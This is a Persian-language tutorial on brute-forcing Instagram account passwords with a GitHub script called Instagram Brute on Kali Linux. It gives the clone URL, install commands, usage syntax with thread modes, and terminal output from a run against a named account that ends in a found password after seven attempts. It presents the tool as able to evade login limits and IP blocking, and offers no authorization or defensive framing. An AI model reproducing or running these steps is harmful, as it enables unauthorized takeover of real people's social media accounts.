روش crack (شکستن پسورد) بیشتر بر روی پسورد های ضعیف تمرکز دارد و هدف از انجام آن به دست آوردن پسورد از طریق تست خطا می باشد. ابزار های زیادی برای این کار به وجود آمدند که هر کدام از آنها دارای نقص هایی بودند. برای مثال پشتیبانی ابزار از پروکسی تور میتواند یک قابلیت مهم در یک ابزار کرک باشد که فقط ابزارهای محدودی این قابلیت را دارند.
در این آزمایش از یک اسکریپت به نام Instagram Brute برای کرک اکانت های اینستاگرام استفاده خواهیم کرد. Instagram Brute یک اسکریپت قوی است که میتواند حملات بروت فورس (کرک) را بر روی اینستاگرام انجام دهد. این اسکریپت می تواند از محدودیت های ورود عبور کرده و پسورهای زیادی را بر روی اکانت تارگت تست کند.
ما این آموزش را بر روی سیستم عامل کالی لینوکس اجرا می کنیم. شما میتوانید روی هر سیستم عامل دیگری انجام دهید.
ابتدا ابزار مربوطه رو با دستور زیر از گیت هاب دانلود میکنیم.
git clone https://github.com/Pure-L0G1C/Instagram.git
root@kali /home/Netk
# cd Desktop
root@kali /home/Netk/Desktop
# git clone https://github.com/pure-L0G1C/Instageram.git
Cloning into 'instageram'...
remote: Enumerating objects: 19, done.
remote: Counting objects : 100% (19/19), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 732 (delta 7), reused 7 (delta 3), pack-reused 713
Receiving objects: 100% (732/732), 32.91 MiB | 3.32 MiB/s, done.
Receiving deltas: 100% (395/395), done.
root@kali /home/Netk/Desktop
#
سپس به ترتیب دستورات زیر را وارد میکنیم. با دستور اول وارد پوشه دانلود شده و با دستورات بعدی مجوزهای لازم را برای ابزار فعال کنیم.
cd Instagram
sudo chmod +x *
sudo apt-get install python-pip
pip3 install -t requirements.txt
root@kali /home/Netk/Desktop/Instageram
# pip3 install -r reguirements.txt
collecting bs4
Downloading bs4.0.0.1.tar.gz (1.1 kb)
requirement already satisfied: future in / usr/lib/python3/dist-pakages ( form -r reguirements.txt (line 2)) ( 0.18.2)
requirement already satisfied: reguests in / usr/lib/python3/dist-pakages ( form -r reguirements.txt (line 3)) ( 2.23.0)
requirement already satisfied: colorama in / usr/lib/python3/dist-pakages ( form -r reguirements.txt (line 4)) ( 0.4.3)
requirement already satisfied: beautifulsoup4 in / usr/lib/python3/dist-pakages ( ffrom bs4->-r requirements.txt (line 1)) (4.9.1)
building wheels for collected packages : bs4
Building wheels for bs4 (setup.py) ... done
Created wheel for bs4: filename=bs4.0.0.1-py3-none-any.whl size=1272 sha256=bd9f19c2f9fdc619aa2065269584166a34ae7ea18b38196dd7213e8566cf240e
Stored in directory: /root/.cache/pip/wheels/75/78/21/68b124549c9bdc94f822c02fb9aa3578a669843f9767776bca
successfully built bs4
Installing collected packages: bs4
successfully installed bs4-0.0.1
root@kali /home/Netk/Desktop/Instageram
#
حال ابزار نصب شده و برای استفاده از آن میتوانید دستور زیر را وارد کنید.
python3 instagram.py username password list -m
در قسمت mode باید تعداد ترد ابزار را وارد کنیم. در لیست زیر میتوانیم عدد این mode را انتخاب کنیم.
(۰) : ۳۲ bots 512 passwords at a time
(۱) : ۱۶ bots 256 passwords at a time
(۲) : ۸ bots 128 passwords at a time
(۳) : ۴ bots 64 passwords at a time
سپس به ترتیب یوزر نیم تارگت و پسورد لیست خود را وارد میکنیم. تعداد تردها را نیز بر اساس سرعت اینترنت خود تنظیم میکنیم.
python3 instagram.py yzdn._.play /home/kaliboys/Desktop/pass.txt -m 3
[-] Wordlist: pass.txt
[-] Username: Yzdn._.play
[-] Password: *******
[-] Complete: 50.0%
[-] Attempts: 6
[-] Browsers: 5
[-] Exists: True
این ابزار میتواند تعدادی نامحدودی از پسورد را بدون بلاک شدن ایپی شما تست کند. همچنین اگر پسورد تارگت شما درون پسوردلیست شما وجود داشت آن را برای شما پیدا کند.
[-] Wordlist: pass.txt
[-] Username: Yzdn._.play
[-] Password: *******
[-] Complete: 58.3333%
[-] Attempts: 7
[-] Browsers: 4
[-] Exists: True
[!] Password Found
[+] Username: Yzdn._.play
[+] Password: *******
root@kali /home/Netk/Desktop/Instagram
#
خب همانطور که در تصویر بالا میبینید پسورد را بعد از ۷ بار تلاش برای ما پیدا کرد.
هنوز بررسیای ثبت نشده است.